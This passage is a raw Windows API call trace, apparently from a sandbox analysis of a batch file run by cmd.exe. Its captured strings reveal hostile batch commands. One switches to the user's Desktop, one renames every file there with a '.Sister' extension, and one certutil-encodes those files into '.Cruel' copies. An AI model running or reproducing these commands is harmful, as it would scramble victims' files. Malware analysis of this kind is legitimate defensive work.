nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x438, lpOverlapped=0x0) returned 1 [0103.361] SetFilePointer (in: hFile=0x3c, lDistanceToMove=199, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc7 [0103.361] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*.Sister) do certutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0103.361] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.361] GetFileType (hFile=0x3c) returned 0x1 [0103.361] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.361] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc7 [0103.361] GetProcessHeap () returned 0x21ed8c70000 [0103.361] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c96f40 [0103.361] GetProcessHeap () returned 0x21ed8c70000 [0103.361] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96f40) returned 1 [0103.361] _tell (_FileHandle=3) returned 199 [0103.361] _close (_FileHandle=3) returned 0 [0103.362] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3c [0103.362] _open_osfhandle (_OSFileHandle=0x3c, _Flags=8) returned 3 [0103.362] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.362] SetFilePointer (in: hFile=0x3c, lDistanceToMove=199, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc7 [0103.362] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.362] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xc7 [0103.362] ReadFile (in: hFile=0x3c, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x436, lpOverlapped=0x0) returned 1 [0103.363] SetFilePointer (in: hFile=0x3c, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0103.363] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=27, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="cd %UserProFile%\\Desktop\\\r\nrtutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 27 [0103.363] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.363] GetFileType (hFile=0x3c) returned 0x1 [0103.363] _get_osfhandle (_FileHandle=3) returned 0x3c [0103.363] SetFilePointer (in: hFile=0x3c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0103.363] GetProcessHeap () returned 0x21ed8c70000 [0103.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c96f40 [0103.363] GetProcessHeap () returned 0x21ed8c70000 [0103.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4010) returned 0x21ed8c9af60 [0103.363] GetProcessHeap () returned 0x21ed8c70000 [0103.363] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x28) returned 0x21ed8c774f0 [0103.363] GetEnvironmentVariableW (in: lpName="UserProFile", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0103.363] GetProcessHeap () returned 0x21ed8c70000 [0103.364] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c774f0) returned 1 [0103.364] GetProcessHeap () returned 0x21ed8c70000 [0103.364] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c9af60) returned 1 [0103.364] GetProcessHeap () returned 0x21ed8c70000 [0103.364] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96f40) returned 1 [0103.365] _wcsicmp (_String1="cd", _String2=")") returned 58 [0103.365] _wcsicmp (_String1="FOR", _String2="cd") returned 3 [0103.365] _wcsicmp (_String1="FOR/?", _String2="cd") returned 3 [0103.365] _wcsicmp (_String1="IF", _String2="cd") returned 6 [0103.365] _wcsicmp (_String1="IF/?", _String2="cd") returned 6 [0103.365] _wcsicmp (_String1="REM", _String2="cd") returned 15 [0103.365] _wcsicmp (_String1="REM/?", _String2="cd") returned 15 [0103.365] GetProcessHeap () returned 0x21ed8c70000 [0103.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96c40 [0103.366] GetProcessHeap () returned 0x21ed8c70000 [0103.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x16) returned 0x21ed8c7b300 [0103.366] GetProcessHeap () returned 0x21ed8c70000 [0103.366] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x44) returned 0x21ed8c7bb20 [0103.366] _tell (_FileHandle=3) returned 226 [0103.366] _close (_FileHandle=3) returned 0 [0103.366] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe748 | out: _Buffer="\r\n") returned 2 [0103.366] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.366] GetFileType (hFile=0x50) returned 0x2 [0103.366] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0103.366] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe6d8 | out: lpMode=0xa6cf4fe6d8) returned 1 [0103.555] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.555] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe718, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe718*=0x2) returned 1 [0103.746] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\") returned 0x3 [0103.746] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe758 | out: _Buffer="C:\\") returned 3 [0103.746] _vsnwprintf (in: _Buffer=0x21ed8e80166, _BufferCount=0x83e2, _Format="%c", _ArgList=0xa6cf4fe758 | out: _Buffer=">") returned 1 [0103.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.746] GetFileType (hFile=0x50) returned 0x2 [0103.746] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0103.746] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe708 | out: lpMode=0xa6cf4fe708) returned 1 [0103.989] _get_osfhandle (_FileHandle=1) returned 0x50 [0103.989] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0xa6cf4fe748, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe748*=0x4) returned 1 [0104.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.078] GetFileType (hFile=0x50) returned 0x2 [0104.079] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0104.079] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0104.160] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.160] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8c7b310*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x21ed8c7b310*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0104.249] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fea18 | out: _Buffer=" C:\\Users\\FD1HVy\\Desktop\\ ") returned 26 [0104.249] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.249] GetFileType (hFile=0x50) returned 0x2 [0104.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0104.249] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9a8 | out: lpMode=0xa6cf4fe9a8) returned 1 [0104.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.347] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe9e8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe9e8*=0x1a) returned 1 [0104.496] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fea48 | out: _Buffer="\r\n") returned 2 [0104.496] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.496] GetFileType (hFile=0x50) returned 0x2 [0104.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0104.496] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe9d8 | out: lpMode=0xa6cf4fe9d8) returned 1 [0104.595] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.595] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fea18, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fea18*=0x2) returned 1 [0104.690] malloc (_Size=0xffce) returned 0x21ed8e90940 [0104.690] ??_V@YAXPEAX@Z () returned 0x21ed8e90940 [0104.690] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0104.690] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0104.690] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0104.690] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0104.690] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0104.690] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0104.690] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe760, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0104.765] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0104.766] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0104.767] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0104.767] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0104.767] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0104.768] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0104.768] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0104.768] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0104.768] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0104.768] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0104.768] ??_V@YAXPEAX@Z () returned 0x1 [0104.768] GetProcessHeap () returned 0x21ed8c70000 [0104.768] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8c7d160 [0104.768] GetProcessHeap () returned 0x21ed8c70000 [0104.768] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d160, Size=0x44) returned 0x21ed8c7d160 [0104.768] GetProcessHeap () returned 0x21ed8c70000 [0104.768] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d160) returned 0x44 [0104.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.768] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0104.768] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0104.768] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0104.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8eb0900, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fe2b0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fe2b0*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0104.771] ??_V@YAXPEAX@Z () returned 0x1 [0104.771] GetProcessHeap () returned 0x21ed8c70000 [0104.771] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4a) returned 0x21ed8c7cb20 [0104.771] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0104.771] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0104.772] GetProcessHeap () returned 0x21ed8c70000 [0104.772] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x78) returned 0x21ed8c7d1c0 [0104.772] GetProcessHeap () returned 0x21ed8c70000 [0104.772] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d1c0, Size=0x44) returned 0x21ed8c7d1c0 [0104.772] GetProcessHeap () returned 0x21ed8c70000 [0104.772] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d1c0) returned 0x44 [0104.772] _wcsnicmp (_String1="C:", _String2="/D", _MaxCount=0x2) returned 52 [0104.772] malloc (_Size=0xffce) returned 0x21ed8ec08e0 [0104.772] ??_V@YAXPEAX@Z () returned 0x21ed8ec08e0 [0104.773] GetProcessHeap () returned 0x21ed8c70000 [0104.773] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7ba30 [0104.773] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8ec08e0 | out: lpBuffer="C:\\") returned 0x3 [0104.773] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x7fe7, lpBuffer=0x21ed8ec08e0, lpFilePart=0xa6cf4fdfe0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0xa6cf4fdfe0*=0x0) returned 0x18 [0104.773] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.773] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb80 [0104.774] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0104.774] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0104.774] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0104.774] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdd10 | out: lpFindFileData=0xa6cf4fdd10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x454b4664, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x454b4664, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cac0 [0104.774] FindClose (in: hFindFile=0x21ed8c7cac0 | out: hFindFile=0x21ed8c7cac0) returned 1 [0104.774] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0104.774] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0104.775] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0104.775] GetProcessHeap () returned 0x21ed8c70000 [0104.775] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95430) returned 1 [0104.775] GetEnvironmentStringsW () returned 0x21ed8c78810* [0104.775] GetProcessHeap () returned 0x21ed8c70000 [0104.775] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb1a) returned 0x21ed8c96f40 [0104.775] FreeEnvironmentStringsA (penv="=") returned 1 [0104.775] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0104.775] GetProcessHeap () returned 0x21ed8c70000 [0104.775] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7ba30) returned 1 [0104.775] ??_V@YAXPEAX@Z () returned 0x1 [0104.776] ??_V@YAXPEAX@Z () returned 0x1 [0104.777] ??_V@YAXPEAX@Z () returned 0x1 [0104.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.778] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x7) returned 1 [0104.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0104.869] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0x7ff66c5cfc08 | out: lpMode=0x7ff66c5cfc08) returned 1 [0104.965] _get_osfhandle (_FileHandle=0) returned 0x4c [0104.965] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x7ff66c5cfc0c | out: lpMode=0x7ff66c5cfc0c) returned 1 [0105.045] SetConsoleInputExeNameW () returned 0x1 [0105.045] GetConsoleOutputCP () returned 0x1b5 [0105.166] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff66c5cfbb0 | out: lpCPInfo=0x7ff66c5cfbb0) returned 1 [0105.166] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.266] ??_V@YAXPEAX@Z () returned 0x1 [0105.268] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0105.268] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0105.268] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.268] SetFilePointer (in: hFile=0x98, lDistanceToMove=226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0105.268] GetProcessHeap () returned 0x21ed8c70000 [0105.268] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d1c0) returned 1 [0105.268] GetProcessHeap () returned 0x21ed8c70000 [0105.268] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7cb20) returned 1 [0105.268] GetProcessHeap () returned 0x21ed8c70000 [0105.268] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7d160) returned 1 [0105.268] GetProcessHeap () returned 0x21ed8c70000 [0105.268] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7bb20) returned 1 [0105.268] GetProcessHeap () returned 0x21ed8c70000 [0105.268] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c7b300) returned 1 [0105.268] GetProcessHeap () returned 0x21ed8c70000 [0105.268] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c96c40) returned 1 [0105.268] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.269] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0105.269] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x41b, lpOverlapped=0x0) returned 1 [0105.269] SetFilePointer (in: hFile=0x98, lDistanceToMove=228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe4 [0105.269] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\n %UserProFile%\\Desktop\\\r\nrtutil -encode \"%%~a\" \"%%~na.Cruel\"\r\n \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0105.269] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.269] GetFileType (hFile=0x98) returned 0x1 [0105.269] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.269] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4 [0105.269] GetProcessHeap () returned 0x21ed8c70000 [0105.269] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c97a70 [0105.269] GetProcessHeap () returned 0x21ed8c70000 [0105.269] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c97a70) returned 1 [0105.270] _tell (_FileHandle=3) returned 228 [0105.270] _close (_FileHandle=3) returned 0 [0105.270] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\AC92.tmp\\ACA2.tmp\\ACA3.bat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\ac92.tmp\\aca2.tmp\\aca3.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xa6cf4fe9b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98 [0105.270] _open_osfhandle (_OSFileHandle=0x98, _Flags=8) returned 3 [0105.270] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.270] SetFilePointer (in: hFile=0x98, lDistanceToMove=228, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xe4 [0105.271] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.271] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe4 [0105.271] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x419, lpOverlapped=0x0) returned 1 [0105.271] SetFilePointer (in: hFile=0x98, lDistanceToMove=320, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x140 [0105.271] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=92, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="for %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 92 [0105.271] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.271] GetFileType (hFile=0x98) returned 0x1 [0105.271] _get_osfhandle (_FileHandle=3) returned 0x98 [0105.271] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x140 [0105.271] GetProcessHeap () returned 0x21ed8c70000 [0105.271] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8c97a70 [0105.272] GetProcessHeap () returned 0x21ed8c70000 [0105.272] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c97a70) returned 1 [0105.272] _wcsicmp (_String1="for", _String2=")") returned 61 [0105.272] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0105.272] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0105.272] GetProcessHeap () returned 0x21ed8c70000 [0105.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c96400 [0105.273] GetProcessHeap () returned 0x21ed8c70000 [0105.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4c) returned 0x21ed8c7cfa0 [0105.273] GetProcessHeap () returned 0x21ed8c70000 [0105.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8c774f0 [0105.273] GetProcessHeap () returned 0x21ed8c70000 [0105.273] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c774f0, Size=0x18) returned 0x21ed8c774f0 [0105.273] GetProcessHeap () returned 0x21ed8c70000 [0105.273] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c774f0) returned 0x18 [0105.273] _wcsicmp (_String1="/L", _String2="%a") returned 10 [0105.273] _wcsicmp (_String1="/D", _String2="%a") returned 10 [0105.273] _wcsicmp (_String1="/F", _String2="%a") returned 10 [0105.273] _wcsicmp (_String1="/R", _String2="%a") returned 10 [0105.273] _wcsicmp (_String1="IN", _String2="in") returned 0 [0105.273] GetProcessHeap () returned 0x21ed8c70000 [0105.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x14) returned 0x21ed8c7b300 [0105.274] _wcsicmp (_String1="DO", _String2="do") returned 0 [0105.274] _wcsicmp (_String1="ren", _String2=")") returned 73 [0105.274] _wcsicmp (_String1="FOR", _String2="ren") returned -12 [0105.274] _wcsicmp (_String1="FOR/?", _String2="ren") returned -12 [0105.274] _wcsicmp (_String1="IF", _String2="ren") returned -9 [0105.274] _wcsicmp (_String1="IF/?", _String2="ren") returned -9 [0105.274] _wcsicmp (_String1="REM", _String2="ren") returned -1 [0105.274] _wcsicmp (_String1="REM/?", _String2="ren") returned -1 [0105.274] GetProcessHeap () returned 0x21ed8c70000 [0105.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb0) returned 0x21ed8c961c0 [0105.274] GetProcessHeap () returned 0x21ed8c70000 [0105.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x18) returned 